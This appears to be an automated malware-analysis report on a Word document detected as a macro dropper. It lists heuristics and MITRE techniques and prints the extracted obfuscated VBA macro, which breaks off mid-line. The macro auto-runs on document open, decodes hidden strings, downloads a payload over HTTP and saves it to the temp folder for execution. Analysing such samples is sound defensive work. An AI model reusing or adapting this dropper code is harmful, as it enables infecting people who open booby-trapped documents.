MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The critical ClamAV detection and high-severity heuristics for VBA macros, including Document_Open, CreateObject, GetObject, and CallByName, indicate malicious intent. The VBA script uses these functions to execute arbitrary code, likely to download and run a second-stage payload. The specific functions GetObject, CreateObject, and CallByName are used to achieve this execution.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-1821470 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-1821470
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5258 bytes |
SHA-256: af53ed5cec37d10e8715006f32afc3d249cc9a8f5e5505e1c87beedda016a234 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function EKiieIlRUAaa()
EKiieIlRUAaa = bvwBYAUSGbUU("ovS")
End Function
Private Function ruwfoGABGjTt(ByVal VumfGWEsqWPB As String, ByVal hFjlzwwPxLzm As String)
Dim GUVHOuckpNOH As Object
Set GUVHOuckpNOH = GetObject(, bvwBYAUSGbUU("opjubdjmqqB/espX"))
CallByName GUVHOuckpNOH, VumfGWEsqWPB, 1, hFjlzwwPxLzm
End Function
Private Sub Document_Open()
Dim gttdejECYPrq
Dim mbMSdVYMssUQ
Dim LTEkbTEQRNri
LTEkbTEQRNri = EKiieIlRUAaa
gttdejECYPrq = bvwBYAUSGbUU("vUlrNqrBiXtZ")
mbMSdVYMssUQ = ruwfoGABGjTt(LTEkbTEQRNri, gttdejECYPrq)
End Sub
Private Sub YsWhAqpMqkTu()
Dim SyCyqeTiQiqp
Dim tFPHVZsKGlEi
Dim hzOEgOCqlULO
hzOEgOCqlULO = EKiieIlRUAaa
SyCyqeTiQiqp = bvwBYAUSGbUU("qXGQQScVfqbK")
tFPHVZsKGlEi = ruwfoGABGjTt(hzOEgOCqlULO, SyCyqeTiQiqp)
End Sub
Private Sub JapeUbRPPFWp()
Dim vRPXSwgqDLQq
Dim nqXUKjWdLVnL
Dim hrEfzLDEJlJy
hrEfzLDEJlJy = EKiieIlRUAaa
vRPXSwgqDLQq = bvwBYAUSGbUU("qwbjX[cYJULJ")
nqXUKjWdLVnL = ruwfoGABGjTt(hrEfzLDEJlJy, vRPXSwgqDLQq)
End Sub
Private Sub IKTIXbZWiavp()
Dim CspGbKDHnqCm
Dim BKHzmvFTnXLd
Dim KptAcyPKbBvi
CspGbKDHnqCm = bvwBYAUSGbUU("kuESpVQUhtWS")
KptAcyPKbBvi = EKiieIlRUAaa
BKHzmvFTnXLd = ruwfoGABGjTt(KptAcyPKbBvi, CspGbKDHnqCm)
End Sub
Private Function nNbEEOGibISX(ByVal MAaxbroNedii As String, ByVal SFxYmrJlNFiF As Integer) As Integer
Dim gpJEJUraZwCX As String
gpJEJUraZwCX = Mid(MAaxbroNedii, SFxYmrJlNFiF, 1)
nNbEEOGibISX = Asc(gpJEJUraZwCX)
End Function
Private Function GmkNmYUGXyCC(ByVal DdWMbcfHbtSb As String) As Integer
Dim DpeMTOiCOoKb
DpeMTOiCOoKb = 1
While Mid(DdWMbcfHbtSb, DpeMTOiCOoKb, 1) <> ""
DpeMTOiCOoKb = DpeMTOiCOoKb + 1
Wend
GmkNmYUGXyCC = DpeMTOiCOoKb - 1
End Function
Private Function bvwBYAUSGbUU(ByVal MAaxbroNedii As String) As String
Dim SLZennNfdTXd As Integer
Dim CpAgvGqfvlEp As String
bvwBYAUSGbUU = ""
For SLZennNfdTXd = 1 To GmkNmYUGXyCC(MAaxbroNedii)
CpAgvGqfvlEp = Chr(nNbEEOGibISX(MAaxbroNedii, SLZennNfdTXd) - 1)
bvwBYAUSGbUU = CpAgvGqfvlEp & bvwBYAUSGbUU
Next SLZennNfdTXd
End Function
Private Sub eswMRUSPonQp(ByVal zgRwOnXZgTrj As Variant)
CallByName zgRwOnXZgTrj, bvwBYAUSGbUU("fqzU"), 4, 1
End Sub
Private Function gMVdMSOdxpYi(ByVal sFbSnVIiRpnY As String, ByVal oZdaKHgdJUBu As String) As Boolean
Dim nhHPxdkSdRMi As Object
Dim QPxOchxebWiC As Variant
Dim vTVBDfxXwFWj As Integer
Dim hYauLHPHVbMW As Object
Dim aoxrceCOoJtf
On Error GoTo BuvkMtUpfkHe
aoxrceCOoJtf = bvwBYAUSGbUU("1/7/QUUIMNYsfwsfT/3MNYTN")
Set hYauLHPHVbMW = CreateObject(aoxrceCOoJtf)
CallByName hYauLHPHVbMW, bvwBYAUSGbUU("ofqP"), 1, bvwBYAUSGbUU("UFH"), sFbSnVIiRpnY, False
CallByName hYauLHPHVbMW, bvwBYAUSGbUU("eofT"), 1
vTVBDfxXwFWj = hYauLHPHVbMW.Status
If vTVBDfxXwFWj <> 100 + 100 Then
GoTo BuvkMtUpfkHe
End If
QPxOchxebWiC = hYauLHPHVbMW.ResponseBody
aoxrceCOoJtf = bvwBYAUSGbUU("nbfsuT/CEPEB")
Set nhHPxdkSdRMi = CreateObject(aoxrceCOoJtf)
eswMRUSPonQp nhHPxdkSdRMi
OVVyWdXjusGs nhHPxdkSdRMi
WgojCxeeTcRj nhHPxdkSdRMi, QPxOchxebWiC
yCILvjFpLaTK nhHPxdkSdRMi, oZdaKHgdJUBu
KzKeCbsfELjv nhHPxdkSdRMi
gMVdMSOdxpYi = True
Exit Function
BuvkMtUpfkHe:
gMVdMSOdxpYi = False
End Function
Private Function sggcRoSuhARu() As String
Dim eLIfZIhcEQxI As Object
Dim XaXsuPUncgAY As String
Dim vMQdyVFByGVz
vMQdyVFByGVz = bvwBYAUSGbUU("udfkcPnfutzTfmjG/hojuqjsdT")
Set eLIfZIhcEQxI = CreateObject(vMQdyVFByGVz)
vMQdyVFByGVz = bvwBYAUSGbUU("sfempGmbjdfqTufH")
XaXsuPUncgAY = eLIfZIhcEQxI.GetSpecialFolder(2)
If XaXsuPUncgAY <> "" Then
sggcRoSuhARu = XaXsuPUncgAY & bvwBYAUSGbUU("0") & Rnd
End If
End Function
Private Sub bjAdloBAPOxW(ByVal sFbSnVIiRpnY As String)
Dim OawrlbRUnqJn As String
Dim JXArvPtHUeWN As Object
Dim WvOhCPhmMHDr
On Error GoTo BuvkMtUpfkHe
OawrlbRUnqJn = sggcRoSuhARu
gM
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.